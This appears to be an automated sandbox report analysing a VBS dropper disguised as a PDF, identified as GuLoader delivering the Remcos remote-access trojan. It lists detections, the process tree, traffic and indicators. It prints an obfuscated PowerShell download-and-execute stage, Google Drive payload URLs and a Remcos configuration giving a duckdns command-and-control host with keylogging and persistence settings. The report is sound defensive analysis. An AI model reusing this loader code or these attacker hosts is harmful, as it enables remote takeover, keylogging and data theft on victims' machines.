Windows Analysis Report
18000012550_20240930_0078864246#U00b7pdf.vbs

Overview

General Information

Sample name: 18000012550_20240930_0078864246#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: 18000012550_20240930_0078864246pdf.vbs
Analysis ID: 1523161
MD5: 89985981616f5fdef265814322d9735d
SHA1: a7a505cea8373907fec133bf34d8d38e86e4dfb2
SHA256: 701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751
Tags: vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7400 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7632 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author
00000004.00000002.1849801435.0000000008250000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.1850125168.000000000B27C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author | Strings
amsi64_7796.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_8036.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xc770:$b2: ::FromBase64String(
              • 0xb7ee:$s1: -join
              • 0xfb0f:$s3: reverse
              • 0x4f9a:$s4: +=
              • 0x505c:$s4: +=
              • 0x9283:$s4: +=
              • 0xb3a0:$s4: +=
              • 0xb68a:$s4: +=
              • 0xb7d0:$s4: +=
              • 0x15b18:$s4: +=
              • 0x15b98:$s4: +=
              • 0x15c5e:$s4: +=
              • 0x15cde:$s4: +=
              • 0x15eb4:$s4: +=
              • 0x15f38:$s4: +=
              • 0xc013:$e4: Get-WmiObject
              • 0xc202:$e4: Get-Process
              • 0xc25a:$e4: Start-Process
              • 0x16779:$e4: Get-Process

              System Summary

              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", ProcessId: 7676, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7400, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", ProcessId: 7676, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument omitted]
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-10-01T07:47:18.943896+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49709 | 216.58.206.78 | 443 | TCP

              AV Detection

              Source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsVirustotal: Detection: 8%Perma Link
              Source: Yara matchFile source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49710 version: TLS 1.2
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1838938605.0000000006E0D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Malware configuration extractorURLs: a458386d9.duckdns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 216.58.206.78:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic DNS traffic detected: DNS query: drive.google.com
              Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000004.00000002.1844919840.0000000006F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181EBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.000002918180D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
              Source: msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/o
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7P
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7XR
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.0000000007480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download
              Source: powershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49709 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49710 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match File source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR

              System Summary

              Source: amsi32_8036.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo 
ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886C5C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886C5B276
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_042FF320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_042FFBF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_042FEFD8
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6992
              Source: unknown Process created: Commandline size = 6992
              Source: amsi32_8036.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Forsvarsministers.Sca
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
